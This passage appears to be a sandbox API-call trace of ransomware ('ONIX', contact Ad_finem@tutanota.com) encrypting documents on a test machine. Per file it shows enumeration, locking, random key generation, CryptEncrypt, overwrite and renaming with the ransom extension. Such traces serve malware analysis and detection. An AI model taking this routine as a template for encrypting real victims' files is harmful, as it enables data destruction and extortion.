lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.638] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5b1c) returned 0x4dab68 [0120.638] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5b1c) returned 0x4e0690 [0120.638] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.638] ReadFile (in: hFile=0x4a8, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x5b1c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x5b1c, lpOverlapped=0x0) returned 1 [0120.639] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-23324, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.639] WriteFile (in: hFile=0x4a8, lpBuffer=0x4e0690*, nNumberOfBytesToWrite=0x5b1c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e0690*, lpNumberOfBytesWritten=0x367f44c*=0x5b1c, lpOverlapped=0x0) returned 1 [0120.640] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5b1c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.640] CloseHandle (hObject=0x4a8) returned 1 [0120.641] GetProcessHeap () returned 0x410000 [0120.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.641] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8wZWO4-Rio-5yWN.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8wzwo4-rio-5ywn.rtf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8wZWO4-Rio-5yWN.rtf.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8wzwo4-rio-5ywn.rtf.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.644] GetProcessHeap () returned 0x410000 [0120.644] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.644] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6be31300, ftCreationTime.dwHighDateTime=0x1d5dc6c, ftLastAccessTime.dwLowDateTime=0xc527cda0, ftLastAccessTime.dwHighDateTime=0x1d5ddef, ftLastWriteTime.dwLowDateTime=0xc527cda0, ftLastWriteTime.dwHighDateTime=0x1d5ddef, nFileSizeHigh=0x0, nFileSizeLow=0x7d8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="awt7.csv", cAlternateFileName="")) returned 1 [0120.644] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\awt7.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\awt7.csv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.645] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.645] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x7d8e, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.645] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.645] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.646] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.646] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.646] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.646] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.646] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\awt7.csv", dwFileAttributes=0x80) returned 1 [0120.649] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\awt7.csv") returned 49 [0120.649] GetProcessHeap () returned 0x410000 [0120.649] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd2) returned 0x460008 [0120.649] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\awt7.csv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\awt7.csv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\awt7.csv" [0120.649] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\awt7.csv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\awt7.csv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\awt7.csv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.649] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=32142) returned 1 [0120.649] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x7d8e [0120.649] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.649] GetProcessHeap () returned 0x410000 [0120.649] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.649] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.649] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.650] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.651] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.652] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7d8e) returned 0x4dab68 [0120.652] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7d8e) returned 0xf50048 [0120.653] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.653] ReadFile (in: hFile=0x4a8, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x7d8e, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x7d8e, lpOverlapped=0x0) returned 1 [0120.654] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-32142, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.654] WriteFile (in: hFile=0x4a8, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0x7d8e, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0x7d8e, lpOverlapped=0x0) returned 1 [0120.655] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x7d8e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.655] CloseHandle (hObject=0x4a8) returned 1 [0120.657] GetProcessHeap () returned 0x410000 [0120.657] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.657] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\awt7.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\awt7.csv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\awt7.csv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\awt7.csv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.659] GetProcessHeap () returned 0x410000 [0120.659] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.659] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57317340, ftCreationTime.dwHighDateTime=0x1d5c0e5, ftLastAccessTime.dwLowDateTime=0xc2fbdc0, ftLastAccessTime.dwHighDateTime=0x1d56fa5, ftLastWriteTime.dwLowDateTime=0xc2fbdc0, ftLastWriteTime.dwHighDateTime=0x1d56fa5, nFileSizeHigh=0x0, nFileSizeLow=0x14da7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B7keM4pLtp2_Gma.xlsx", cAlternateFileName="B7KEM4~1.XLS")) returned 1 [0120.659] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7keM4pLtp2_Gma.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b7kem4pltp2_gma.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.659] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.660] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x14da7, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.660] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.660] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.660] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.660] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.661] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.661] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.661] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7keM4pLtp2_Gma.xlsx", dwFileAttributes=0x80) returned 1 [0120.661] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7keM4pLtp2_Gma.xlsx") returned 61 [0120.661] GetProcessHeap () returned 0x410000 [0120.661] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x449878 [0120.661] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7keM4pLtp2_Gma.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7keM4pLtp2_Gma.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7keM4pLtp2_Gma.xlsx" [0120.661] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7keM4pLtp2_Gma.xlsx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7keM4pLtp2_Gma.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7keM4pLtp2_Gma.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.661] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=85415) returned 1 [0120.661] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x14da7 [0120.661] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.661] GetProcessHeap () returned 0x410000 [0120.661] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.662] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.663] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.664] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.665] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.667] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14da7) returned 0xf50048 [0120.668] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14da7) returned 0xf64df8 [0120.668] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.668] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x14da7, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x14da7, lpOverlapped=0x0) returned 1 [0120.670] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-85415, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.670] WriteFile (in: hFile=0x4a8, lpBuffer=0xf64df8*, nNumberOfBytesToWrite=0x14da7, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf64df8*, lpNumberOfBytesWritten=0x367f44c*=0x14da7, lpOverlapped=0x0) returned 1 [0120.674] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x14da7, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.674] CloseHandle (hObject=0x4a8) returned 1 [0120.675] GetProcessHeap () returned 0x410000 [0120.675] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.675] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7keM4pLtp2_Gma.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b7kem4pltp2_gma.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7keM4pLtp2_Gma.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b7kem4pltp2_gma.xlsx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.678] GetProcessHeap () returned 0x410000 [0120.678] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.678] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb883c0c0, ftCreationTime.dwHighDateTime=0x1d56cf4, ftLastAccessTime.dwLowDateTime=0x1e071600, ftLastAccessTime.dwHighDateTime=0x1d5c7d5, ftLastWriteTime.dwLowDateTime=0x1e071600, ftLastWriteTime.dwHighDateTime=0x1d5c7d5, nFileSizeHigh=0x0, nFileSizeLow=0x11fde, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CcwgDvZX2X.pptx", cAlternateFileName="CCWGDV~1.PPT")) returned 1 [0120.678] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcwgDvZX2X.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccwgdvzx2x.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.678] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.678] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x11fde, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.678] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.678] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.679] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.679] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.679] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.679] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.679] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcwgDvZX2X.pptx", dwFileAttributes=0x80) returned 1 [0120.679] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcwgDvZX2X.pptx") returned 56 [0120.679] GetProcessHeap () returned 0x410000 [0120.680] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe0) returned 0x460008 [0120.680] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcwgDvZX2X.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcwgDvZX2X.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcwgDvZX2X.pptx" [0120.680] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcwgDvZX2X.pptx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcwgDvZX2X.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcwgDvZX2X.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.680] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=73694) returned 1 [0120.680] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x11fde [0120.680] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.680] GetProcessHeap () returned 0x410000 [0120.680] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.680] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.682] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.684] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.685] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.686] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11fde) returned 0xf50048 [0120.687] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11fde) returned 0xf62030 [0120.687] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.687] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x11fde, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x11fde, lpOverlapped=0x0) returned 1 [0120.689] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-73694, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.689] WriteFile (in: hFile=0x4a8, lpBuffer=0xf62030*, nNumberOfBytesToWrite=0x11fde, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf62030*, lpNumberOfBytesWritten=0x367f44c*=0x11fde, lpOverlapped=0x0) returned 1 [0120.691] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x11fde, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.691] CloseHandle (hObject=0x4a8) returned 1 [0120.691] GetProcessHeap () returned 0x410000 [0120.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.692] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcwgDvZX2X.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccwgdvzx2x.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CcwgDvZX2X.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccwgdvzx2x.pptx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.694] GetProcessHeap () returned 0x410000 [0120.694] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.694] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe2380, ftCreationTime.dwHighDateTime=0x1d5e6b9, ftLastAccessTime.dwLowDateTime=0x6e6c5700, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0x6e6c5700, ftLastWriteTime.dwHighDateTime=0x1d5db9d, nFileSizeHigh=0x0, nFileSizeLow=0x14101, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D4mBFL_7lQ8RvM.doc", cAlternateFileName="D4MBFL~1.DOC")) returned 1 [0120.695] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4mBFL_7lQ8RvM.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d4mbfl_7lq8rvm.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.695] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.695] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x14101, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.695] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.695] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.696] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.696] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.696] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.696] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.696] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4mBFL_7lQ8RvM.doc", 